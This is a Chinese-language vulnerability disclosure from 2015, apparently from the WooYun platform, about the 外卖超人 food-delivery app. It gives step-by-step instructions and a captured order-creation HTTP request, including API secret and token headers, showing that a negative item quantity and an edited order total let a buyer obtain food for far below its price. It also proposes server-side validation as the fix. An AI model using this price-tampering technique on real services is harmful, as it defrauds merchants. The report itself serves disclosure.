漏洞概要 关注数(24) 关注此漏洞
>
漏洞详情
披露状态:
2015-10-12: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-26: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
可以修改订单中数据,最低可1元无限购买。
详细说明:
1.打开外卖超人APP
2.使用封包工具截取订单信息(WPE、charles均可)
3.提交订单时截取数据(点击结算)
POST /api/v2/order/create/ HTTP/1.1..X-ApiSecret: 9bdac88ccf0c74cf7878f589757eebd0..If-None-Match: "32e80791f1566b77f8cce91303cbb9ca"..X-token: b87921470408cee78bd5a6e9246f4cd0..User-Agent: Android/MI NOTE Pro/5.0.2/yogiyo-android-4.4.1..If-Modified-Since: Sat, 10 Oct 2015 08:21:57 GMT+00:00..X-ApiKey: android..Content-Type: application/json charset=uft-8..Host: waimaichaoren.com..Connection: Keep-Alive..Accept-Encoding: gzip..Content-Length: 322....menu_items=[{"id":2797148,"p":"39.50","q":-8,"opts":[]},{"id":2797166,"p":"31.00","q":11,"opts":[]}]&lang=zh&order_source=android&delivery_fee=8.0&restaurant_id=33925&addition_data={}&location_id=11707169&menu_items_total=025.0&
3.修改数量:q:-8(我是用wpe修改的)
4.在定11份31块钱的,这样39.5*-8+31*11+8元外送费=33元,而实际送来的是19份饭。
漏洞证明:
使用wpe修改外卖超人app结算的订单即可,图片已经很详细了,封包的内容也全部附上了。
"p":"39.50","q":-8,
menu_items_total=025.0
修改这两个参数:Q=-8(数量) 和 menu_items_total=025.0(金额)
修复方案:
服务器验证商品数量不可以为负
版权声明:转载请注明来源 月神@乌云
>
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝